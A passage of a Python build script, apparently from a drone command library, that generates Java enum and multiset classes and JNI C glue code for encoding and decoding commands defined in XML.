jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write ('\n')
jfile.write ('}\n')
jfile.close ()
# Generate java enums type
for ftr in allFeatures:
for enum in ftr.enums:
oldEnumValFrm = False if ftr.classes == None else True
CLASS_NAME = ARJavaEnumType (LIB_MODULE, get_ftr_old_name(ftr), enum.name)
JFILE_NAME = paths.JNIJ_OUT_DIR + CLASS_NAME + '.java'
UNKNOWN_VALUE = ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, 'UNKNOWN') if ftr.classes == None else 'e'+AREnumValue(LIB_MODULE, get_ftr_old_name(ftr), enum.name,'UNKNOWN_ENUM_VALUE')
jfile = open(JFILE_NAME, 'w')
jfile.write(LICENCE_HEADER)
jfile.write('\n')
jfile.write('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write('\n')
jfile.write('import java.util.HashMap;\n')
jfile.write('\n')
jfile.write('/**\n')
jfile.write(' * Java copy of the ' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), enum.name) + ' enum\n')
jfile.write(' */\n')
jfile.write('public enum ' + CLASS_NAME + ' {\n')
jfile.write(' /** Dummy value for all unknown cases */\n')
jfile.write(' ' + UNKNOWN_VALUE + ' (Integer.MIN_VALUE, "Dummy value for all unknown cases"),\n')
previousVal = -1
for eVal in enum.values:
val = eVal.value if eVal.value is not None else previousVal +1
previousVal = int(val)
jfile.write(' ')
if eVal.doc:
jfile.write('/** '+eVal.doc.replace('\n', ' ')+' */\n ')
if eVal.doc:
jfile.write(ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name, oldEnumValFrm)+ ' (' + str(val)+ ', "'+eVal.doc.replace('\n', ' ')+'")')
else:
jfile.write(ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name, oldEnumValFrm) + ' (' + str(val) + ')')
#If it is the last value of a feature enum.
if ftr.classes == None and eVal == enum.values[-1]:
jfile.write(';\n')
else:
jfile.write(',\n')
# Add MAX value only if it is an old enum.
if ftr.classes:
MAX_VALUE = ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, 'MAX', oldEnumValFrm)
jfile.write(' ' + MAX_VALUE + ' ('+ str(previousVal + 1) +');\n')
jfile.write('\n')
jfile.write('\n')
jfile.write(' private final int value;\n')
jfile.write(' private final String comment;\n');
jfile.write(' static HashMap<Integer, ' + CLASS_NAME + '> valuesList;\n')
jfile.write('\n')
jfile.write(' ' + CLASS_NAME + ' (int value) {\n')
jfile.write(' this.value = value;\n')
jfile.write(' this.comment = null;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' ' + CLASS_NAME + ' (int value, String comment) {\n')
jfile.write(' this.value = value;\n')
jfile.write(' this.comment = comment;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Gets the int value of the enum\n')
jfile.write(' * @return int value of the enum\n')
jfile.write(' */\n')
jfile.write(' public int getValue () {\n')
jfile.write(' return value;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Gets the ' + CLASS_NAME + ' instance from a C enum value\n')
jfile.write(' * @param value C value of the enum\n')
jfile.write(' * @return The ' + CLASS_NAME + ' instance, or null if the C enum value was not valid\n')
jfile.write(' */\n')
jfile.write(' public static ' + CLASS_NAME + ' getFromValue (int value) {\n')
jfile.write(' if (null == valuesList) {\n')
jfile.write(' ' + CLASS_NAME + ' [] valuesArray = ' + CLASS_NAME + '.values ();\n')
jfile.write(' valuesList = new HashMap<Integer, ' + CLASS_NAME + '> (valuesArray.length);\n')
jfile.write(' for (' + CLASS_NAME + ' entry : valuesArray) {\n')
jfile.write(' valuesList.put (entry.getValue (), entry);\n')
jfile.write(' }\n')
jfile.write(' }\n')
jfile.write(' ' + CLASS_NAME + ' retVal = valuesList.get (value);\n')
jfile.write(' if (retVal == null) {\n')
jfile.write(' retVal = ' + UNKNOWN_VALUE + ';\n')
jfile.write(' }\n')
jfile.write(' return retVal;')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Returns the enum comment as a description string\n')
jfile.write(' * @return The enum description\n')
jfile.write(' */\n')
jfile.write(' public String toString () {\n')
jfile.write(' if (this.comment != null) {\n')
jfile.write(' return this.comment;\n')
jfile.write(' }\n')
jfile.write(' return super.toString ();\n')
jfile.write(' }\n')
jfile.write('}\n')
jfile.close()
for multiset in ftr.multisets:
oldEnumValFrm = False if ftr.classes == None else True
CLASS_NAME = ARJavaMultiSetType (LIB_MODULE, get_ftr_old_name(ftr), multiset.name)
JFILE_NAME = paths.JNIJ_OUT_DIR + CLASS_NAME + '.java'
jfile = open(JFILE_NAME, 'w')
jfile.write(LICENCE_HEADER)
jfile.write('\n')
jfile.write('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write('\n')
jfile.write('/**\n')
jfile.write(' * Java copy of the ' + ARJavaMultiSetType (LIB_MODULE, get_ftr_old_name(ftr), enum.name) + '\n')
jfile.write(' */\n')
jfile.write('public class ' + CLASS_NAME + ' {\n')
jfile.write('\n')
for multiset_msg in multiset.msgs:
jfile.write(' private static class ' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' {\n')
jfile.write(' public int isSet;\n')
for multiset_msg_arg in multiset_msg.args:
jfile.write(' public '+ xmlToJava(LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) +' ' + multiset_msg_arg.name + ';\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' public ' + CLASS_NAME + ' () {\n')
jfile.write(' }\n')
jfile.write('\n')
for multiset_msg in multiset.msgs:
jfile.write(' private final ' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' = new ' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '();\n')
jfile.write('\n')
for multiset_msg in multiset.msgs:
jfile.write(' public void set' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' (')
isFirst = True
for multiset_msg_arg in multiset_msg.args:
if not isFirst:
jfile.write(', ')
isFirst = False
jfile.write( xmlToJava(LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) +' ' + multiset_msg_arg.name )
jfile.write(') {\n')
jfile.write( ' _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.isSet = 1;\n')
for multiset_msg_arg in multiset_msg.args:
jfile.write( ' _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.'+multiset_msg_arg.name+' = ' + multiset_msg_arg.name+';\n' )
jfile.write(' }\n')
jfile.write('\n')
for multiset_msg in multiset.msgs:
jfile.write(' public int get' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + 'IsSet () {\n')
jfile.write( ' return _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.isSet;\n')
jfile.write(' }\n')
jfile.write('\n')
for multiset_msg_arg in multiset_msg.args:
jfile.write(' public '+ xmlToJava(LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) +' get' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ARCapitalize(multiset_msg_arg.name) +' () {\n')
jfile.write( ' return _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.'+multiset_msg_arg.name+';\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write('}\n')
jfile.close()
# Generate java enums
#enumDecErr = ArEnum(DEC_SUBMODULE+'_'+DEC_ERR_ENAME, 'Error codes for ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' function')
enumDecErr = ArEnum(DEC_ERR_ENAME, 'Error codes for ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' function')
enumDecErr.values.append(ArEnumValue('OK', 0, 'No error occured'))
enumDecErr.values.append(ArEnumValue('NO_CALLBACK', 1, 'No error, but no callback was set (so the call had no effect)'))
enumDecErr.values.append(ArEnumValue('UNKNOWN_COMMAND', 2, 'The command buffer contained an unknown command'))
enumDecErr.values.append(ArEnumValue('NOT_ENOUGH_DATA', 3, 'The command buffer did not contain enough data for the specified command'))
enumDecErr.values.append(ArEnumValue('NOT_ENOUGH_SPACE', 4, 'The string buffer was not big enough for the command description'))
enumDecErr.values.append(ArEnumValue('ERROR', 5, 'Any other error'))
#enumFilterErr = ArEnum(FIL_SUBMODULE+'_'+FIL_ERROR_ENAME, 'Error code for ARCOMMANDS_Filter functions.')
enumFilterErr = ArEnum(FIL_ERROR_ENAME, 'Error code for ARCOMMANDS_Filter functions.')
enumFilterErr.values.append(ArEnumValue('OK', 0,'No error.'))
enumFilterErr.values.append(ArEnumValue('ALLOC', 1,'Memory allocation error.'))
enumFilterErr.values.append(ArEnumValue('BAD_STATUS', 2,'The given status is not a valid status.'))
enumFilterErr.values.append(ArEnumValue('BAD_FILTER', 3,'The given filter is not a valid filter.'))
enumFilterErr.values.append(ArEnumValue('BAD_BUFFER', 4,'The given buffer is not a valid buffer.'))
enumFilterErr.values.append(ArEnumValue('OTHER', 5,'Any other error.'))
#enumFilterStatus = ArEnum(FIL_SUBMODULE+'_'+FIL_STATUS_ENAME,'Status code for ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' function')
enumFilterStatus = ArEnum(FIL_STATUS_ENAME,'Status code for ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' function')
enumFilterStatus.values.append(ArEnumValue('ALLOWED', 0,'The command should pass the filter'))
enumFilterStatus.values.append(ArEnumValue('BLOCKED', 1,'The command should not pass the filter'))
enumFilterStatus.values.append(ArEnumValue('UNKNOWN', 2,'Unknown command. The command was possibly added in a newer version of libARCommands, or is an invalid command.'))
enumFilterStatus.values.append(ArEnumValue('ERROR', 3, 'The filtering of the command failed.'))
#enumGenErr = ArEnum(GEN_SUBMODULE+'_'+GEN_ERR_ENAME,'Error codes for ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'GenerateCommand') + ' functions')
enumGenErr = ArEnum(GEN_ERR_ENAME,'Error codes for ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'GenerateCommand') + ' functions')
enumGenErr.values.append(ArEnumValue( 'OK', 0,'No error occured'))
enumGenErr.values.append(ArEnumValue('BAD_ARGS', 1, 'At least one of the arguments is invalid'))
enumGenErr.values.append(ArEnumValue('NOT_ENOUGH_SPACE', 2, 'The given output buffer was not large enough for the command'))
enumGenErr.values.append(ArEnumValue('ERROR', 3, 'Any other error'))
enums = [enumDecErr, enumFilterErr, enumFilterStatus, enumGenErr]
subModules = [DEC_SUBMODULE, FIL_SUBMODULE, FIL_SUBMODULE, GEN_SUBMODULE]
for enum in enums:
submodule = subModules[enums.index(enum)]
#CLASS_NAME = LIB_MODULE.upper () + submodule.upper() + '_' + enum.name.upper () + '_ENUM'
CLASS_NAME = ARJavaEnumType (LIB_MODULE, submodule, enum.name)
JFILE_NAME = paths.JNIJ_OUT_DIR + CLASS_NAME + '.java'
UNKNOWN_VALUE = 'e'+ARJavaEnumValDef(LIB_MODULE, submodule, enum.name, 'UNKNOWN_ENUM_VALUE', True)
jfile = open(JFILE_NAME, 'w')
jfile.write(LICENCE_HEADER)
jfile.write('\n')
jfile.write('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write('\n')
jfile.write('import java.util.HashMap;\n')
jfile.write('\n')
jfile.write('/**\n')
jfile.write(' * Java copy of the ' + AREnumName (LIB_MODULE, submodule, enum.name) + ' enum\n')
jfile.write(' */\n')
jfile.write('public enum ' + CLASS_NAME + ' {\n')
jfile.write(' /** Dummy value for all unknown cases */\n')
jfile.write(' ' + UNKNOWN_VALUE + ' (Integer.MIN_VALUE, "Dummy value for all unknown cases"),\n')
previousVal = -1
for eVal in enum.values:
val = eVal.value if eVal.value is not None else previousVal +1
previousVal = int(val)
jfile.write(' ')
if eVal.doc:
jfile.write('/** '+eVal.doc.replace('\n', ' ')+' */\n ')
if eVal.doc:
jfile.write(ARJavaEnumValDef(LIB_MODULE, submodule, enum.name, eVal.name, True)+ ' (' + str(val)+ ', "'+eVal.doc.replace('\n', ' ')+'")')
else:
jfile.write(ARJavaEnumValDef(LIB_MODULE, submodule, enum.name, eVal.name, True) + ' (' + str(val) + ')')
#If it is the last value of the enum.
if eVal == enum.values[-1]:
jfile.write(';\n')
else:
jfile.write(',\n')
jfile.write('\n')
jfile.write(' private final int value;\n')
jfile.write(' private final String comment;\n');
jfile.write(' static HashMap<Integer, ' + CLASS_NAME + '> valuesList;\n')
jfile.write('\n')
jfile.write(' ' + CLASS_NAME + ' (int value) {\n')
jfile.write(' this.value = value;\n')
jfile.write(' this.comment = null;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' ' + CLASS_NAME + ' (int value, String comment) {\n')
jfile.write(' this.value = value;\n')
jfile.write(' this.comment = comment;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Gets the int value of the enum\n')
jfile.write(' * @return int value of the enum\n')
jfile.write(' */\n')
jfile.write(' public int getValue () {\n')
jfile.write(' return value;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Gets the ' + CLASS_NAME + ' instance from a C enum value\n')
jfile.write(' * @param value C value of the enum\n')
jfile.write(' * @return The ' + CLASS_NAME + ' instance, or null if the C enum value was not valid\n')
jfile.write(' */\n')
jfile.write(' public static ' + CLASS_NAME + ' getFromValue (int value) {\n')
jfile.write(' if (null == valuesList) {\n')
jfile.write(' ' + CLASS_NAME + ' [] valuesArray = ' + CLASS_NAME + '.values ();\n')
jfile.write(' valuesList = new HashMap<Integer, ' + CLASS_NAME + '> (valuesArray.length);\n')
jfile.write(' for (' + CLASS_NAME + ' entry : valuesArray) {\n')
jfile.write(' valuesList.put (entry.getValue (), entry);\n')
jfile.write(' }\n')
jfile.write(' }\n')
jfile.write(' ' + CLASS_NAME + ' retVal = valuesList.get (value);\n')
jfile.write(' if (retVal == null) {\n')
jfile.write(' retVal = ' + UNKNOWN_VALUE + ';\n')
jfile.write(' }\n')
jfile.write(' return retVal;')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Returns the enum comment as a description string\n')
jfile.write(' * @return The enum description\n')
jfile.write(' */\n')
jfile.write(' public String toString () {\n')
jfile.write(' if (this.comment != null) {\n')
jfile.write(' return this.comment;\n')
jfile.write(' }\n')
jfile.write(' return super.toString ();\n')
jfile.write(' }\n')
jfile.write('}\n')
jfile.close()
def jni_generateCmds(ctx, paths):
genDebug = True
genTreeFilename = None
projects = [DEFAULTPROJECTNAME]
if not os.path.exists (paths.JNI_DIR):
os.makedirs (paths.JNI_DIR)
if not os.path.exists (paths.JNIC_DIR):
os.makedirs (paths.JNIC_DIR)
allFeatures = ctx.features
# Check types used
for ftr in allFeatures:
for msg in ftr.getMsgs():
for arg in msg.args:
if isinstance(arg.argType, ArEnum):
hasArgOfType[ArArgType.ENUM] = True
elif isinstance(arg.argType, ArBitfield):
hasArgOfType[ArArgType.BITFIELD] = True
hasArgOfType[arg.argType.btfType] = True
elif isinstance(arg.argType, ArMultiSetting):
hasArgOfType[ArArgType.MULTISETTING] = True
else:
hasArgOfType[arg.argType] = True
cfile = open (paths.JNI_CFILE, 'w')
JNI_FUNC_PREFIX='Java_' + JNI_PACKAGE_NAME.replace ('.', '_') + '_'
JNI_FIRST_ARGS='JNIEnv *env, jobject thizz'
JNI_FIRST_ARGS_STATIC='JNIEnv *env, jclass clazz'
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n')
cfile.write ('#include <jni.h>\n')
cfile.write ('#include <stdlib.h>\n')
cfile.write ('\n')
cfile.write ('#define TOSTRING_STRING_SIZE (1024)\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT jstring JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIClassName + '_nativeToString (' + JNI_FIRST_ARGS + ', jlong jpdata, jint jdataSize)\n')
cfile.write ('{\n')
cfile.write (' jstring ret = NULL;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' char *cstr = calloc (TOSTRING_STRING_SIZE, 1);\n')
cfile.write (' if (cstr == NULL)\n')
cfile.write (' {\n')
cfile.write (' return ret;\n')
cfile.write (' }\n')
cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' ((uint8_t *)(intptr_t)jpdata, jdataSize, cstr, TOSTRING_STRING_SIZE);\n')
cfile.write (' if (err == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ret = (*env)->NewStringUTF(env, cstr);\n')
cfile.write (' }\n')
cfile.write (' free (cstr);\n')
cfile.write (' return ret;\n')
cfile.write ('}\n')
cfile.write ('JNIEXPORT jstring JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIClassName + '_nativeStaticToString (' + JNI_FIRST_ARGS_STATIC + ', jlong jpdata, jint jdataSize)\n')
cfile.write ('{\n')
cfile.write (' jstring ret = NULL;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' char *cstr = calloc (TOSTRING_STRING_SIZE, 1);\n')
cfile.write (' if (cstr == NULL)\n')
cfile.write (' {\n')
cfile.write (' return ret;\n')
cfile.write (' }\n')
cfile.write (' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' ((uint8_t *)(intptr_t)jpdata, jdataSize, cstr, TOSTRING_STRING_SIZE);\n')
cfile.write (' if (err == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ret = (*env)->NewStringUTF(env, cstr);\n')
cfile.write (' }\n')
cfile.write (' free (cstr);\n')
cfile.write (' return ret;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('/* END OF GENERAED CODE */\n')
cfile.close ()
def cCallbackName (ftr, cmd):
return ARFunctionName (LIB_MODULE, JNI_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'nativeCallback')
def jmethodeCbName (ftr, cmd):
return LIB_MODULE+ '_'+JNI_SUBMODULE+ '_'+get_ftr_old_name(ftr).upper()+ '_'+format_cmd_name(cmd).upper() + '_CB'
cfile = open (paths.JNI_DECODER_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n')
cfile.write ('#include <jni.h>\n')
cfile.write ('#include <stdlib.h>\n')
cfile.write ('\n')
cfile.write ('typedef struct\n')
cfile.write ('{\n')
cfile.write (' jobject javaDecoder; /**< java decoder */\n')
cfile.write (' ARCOMMANDS_Decoder_t *nativeDecoder; /**< native decoder*/\n')
cfile.write ('} ARCOMMANDS_JNI_Decoder_t;\n')
cfile.write ('\n')
cfile.write ('static JavaVM *g_vm = NULL;\n')
cfile.write ('static jfieldID g_dataSize_id = 0;\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write ('static jmethodID ' +jmethodeCbName(ftr, cmd)+ ';\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write ('JNI_OnLoad (JavaVM *vm, void *reserved)\n')
cfile.write ('{\n')
cfile.write (' g_vm = vm;\n')
cfile.write (' JNIEnv *env = NULL;\n')
cfile.write (' if ((*vm)->GetEnv (vm, (void **)&env, JNI_VERSION_1_6) != JNI_OK)\n')
cfile.write (' {\n')
cfile.write (' return -1;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' return JNI_VERSION_1_6;\n')
cfile.write ('}\n')
cfile.write ('JNIEXPORT void JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeStaticInit (' + JNI_FIRST_ARGS_STATIC + ')\n')
cfile.write ('{\n')
cfile.write (' jclass decoder_clazz = (*env)->FindClass (env, "' + JNI_PACKAGE_NAME.replace ('.', '/') + '/' + JNIDecoderClassName + '");\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write (' '+jmethodeCbName(ftr, cmd)+ ' = (*env)->GetMethodID (env, decoder_clazz, "' + javaCbName (ftr, cmd) + '", "(')
for arg in cmd.args:
cfile.write ('' + xmlToJavaSig (ftr, cmd, arg))
cfile.write (')V");\n')
cfile.write ('\n')
cfile.write (' /* cleanup */\n')
cfile.write (' (*env)->DeleteLocalRef (env, decoder_clazz);\n')
cfile.write ('}\n')
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeDecode (' + JNI_FIRST_ARGS + ', jlong jdecoder, jlong jpdata, jint jdataSize)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = (ARCOMMANDS_JNI_Decoder_t *) (intptr_t)jdecoder;\n')
cfile.write (' uint8_t *pdata = (uint8_t *) (intptr_t)jpdata;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (decoder->nativeDecoder, pdata, jdataSize);\n')
cfile.write (' return err;\n')
cfile.write ('}\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write ('JNIEXPORT jint JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIClassName + '_nativeSet' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (' + JNI_FIRST_ARGS + ', jlong c_pdata, jint dataLen')
for arg in cmd.args:
if isinstance(arg.argType, ArMultiSetting):
for multiset_msg in arg.argType.msgs:
cfile.write (', jint '+multiset_msg.ftr.name+ multiset_msg.name+'IsSet')
for multiset_msg_arg in multiset_msg.args:
cfile.write (', ' + xmlToJni (multiset_msg.ftr, multiset_msg, multiset_msg_arg) + ' ' +multiset_msg.ftr.name+ multiset_msg.name+ multiset_msg_arg.name)
else:
cfile.write (', ' + xmlToJni (ftr, cmd, arg) + ' ' + arg.name)
cfile.write (')\n')
cfile.write ('{\n')
cfile.write (' int32_t c_dataSize = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' err = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'ERROR') + ';\n');
cfile.write (' if (g_dataSize_id == 0)\n')
cfile.write (' {\n')
cfile.write (' jclass clz = (*env)->GetObjectClass (env, thizz);\n')
cfile.write (' if (clz != 0)\n')
cfile.write (' {\n')
cfile.write (' g_dataSize_id = (*env)->GetFieldID (env, clz, "used", "I");\n')
cfile.write (' (*env)->DeleteLocalRef (env, clz);\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' return err;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
cfile.write (' const char *c_' + arg.name + ' = (*env)->GetStringUTFChars (env, ' + arg.name + ', NULL);\n')
elif isinstance(arg.argType, ArMultiSetting):
cfile.write (' ' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ' c_' + arg.name + ' = {\n')
for multiset_msg in arg.argType.msgs:
cfile.write (' .'+multiset_msg.name+'.isSet = '+multiset_msg.ftr.name+ multiset_msg.name+'IsSet,\n')
for multiset_msg_arg in multiset_msg.args:
cfile.write (' .'+multiset_msg.name+'.'+multiset_msg_arg.name+' = ' +multiset_msg.ftr.name+ multiset_msg.name+ multiset_msg_arg.name+',\n')
cfile.write ('};\n')
cfile.write (' err = ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' ((uint8_t *) (intptr_t) c_pdata, dataLen, &c_dataSize')
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
cfile.write (', c_' + arg.name)
elif isinstance(arg.argType, ArMultiSetting):
cfile.write (', &c_' + arg.name)
else:
cfile.write (', (' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ')' + arg.name)
cfile.write (');\n')
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
cfile.write (' (*env)->ReleaseStringUTFChars (env, ' + arg.name + ', c_' + arg.name + ');\n')
cfile.write (' if (err == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' (*env)->SetIntField (env, thizz, g_dataSize_id, (jint)c_dataSize);\n')
cfile.write (' }\n')
cfile.write (' return err;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write ('void ' + cCallbackName (ftr, cmd) + ' (')
for arg in cmd.args:
cfile.write (xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg, True) + ' ' + arg.name + ', ')
cfile.write ('void *custom)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = (ARCOMMANDS_JNI_Decoder_t *)custom;\n')
cfile.write (' jint res;\n')
cfile.write (' JNIEnv *env = NULL;\n')
cfile.write (' res = (*g_vm)->GetEnv (g_vm, (void **)&env, JNI_VERSION_1_6);\n')
cfile.write (' if (res < 0) { return; }\n')
cfile.write ('\n')
for arg in _get_args_multiset(cmd.args):
cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE,'Decode'+ARCapitalize(ftr.name)+ARCapitalize(cmd.name))+' (decoder->nativeDecoder, '+arg.name+');\n')
for arg in _get_args_without_multiset(cmd.args):
if ArArgType.STRING == arg.argType:
cfile.write (' jstring j_' + arg.name + ' = (*env)->NewStringUTF (env, ' + arg.name + ');\n')
elif isinstance(arg.argType, ArEnum):
cfile.write (' jclass j_' + arg.name + '_class = (*env)->FindClass (env, "' + jniEnumClassName (ftr, cmd, arg) + '");\n')
cfile.write (' jmethodID j_' + arg.name + '_mid = (*env)->GetStaticMethodID (env, j_' + arg.name + '_class, "getFromValue", "(I)' + xmlToJavaSig(ftr, cmd, arg) + '");\n')
cfile.write (' jobject j_' + arg.name + '_enum = (*env)->CallStaticObjectMethod (env, j_' + arg.name + '_class, j_' + arg.name + '_mid, ' + arg.name + ');\n')
if not list(_get_args_multiset(cmd.args)):
cfile.write (' (*env)->CallVoidMethod (env, decoder->javaDecoder, '+jmethodeCbName (ftr, cmd))
for arg in _get_args_without_multiset(cmd.args):
if ArArgType.STRING == arg.argType:
cfile.write (', j_' + arg.name)
elif isinstance(arg.argType, ArEnum):
cfile.write (', j_' + arg.name + '_enum')
else:
cfile.write (', ' + xmlToJniCast(ftr, cmd, arg) + arg.name)
cfile.write (');\n')
for arg in _get_args_without_multiset(cmd.args):
if ArArgType.STRING == arg.argType:
cfile.write (' (*env)->DeleteLocalRef (env, j_' + arg.name + ');\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('JNIEXPORT jlong JNICALL\n')
cfile.write (JNI_FUNC_PREFIX + JNIDecoderClassName + '_nativeNewDecoder (' + JNI_FIRST_ARGS + ')\n')
cfile.write ('{\n')
cfile.write (' int failed = 0;\n')
cfile.write (' ARCOMMANDS_JNI_Decoder_t *decoder = calloc(1, sizeof(ARCOMMANDS_JNI_Decoder_t));\n')
cfile.write (' if (decoder == NULL)\n')
cfile.write (' {\n')
cfile.write (' failed = 1;\n')
cfile.write (' }\n')
cfile.write (' \n')
cfile.write (' if (!failed)\n')
cfile.write (' {\n')
cfile.write (' decoder->nativeDecoder = ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'NewDecoder') + ' (NULL);\n')
cfile.write (' if (decoder->nativeDecoder == NULL)\n')
cfile.write (' {\n')
cfile.write (' failed = 1;\n')
cfile.write (' }\n')
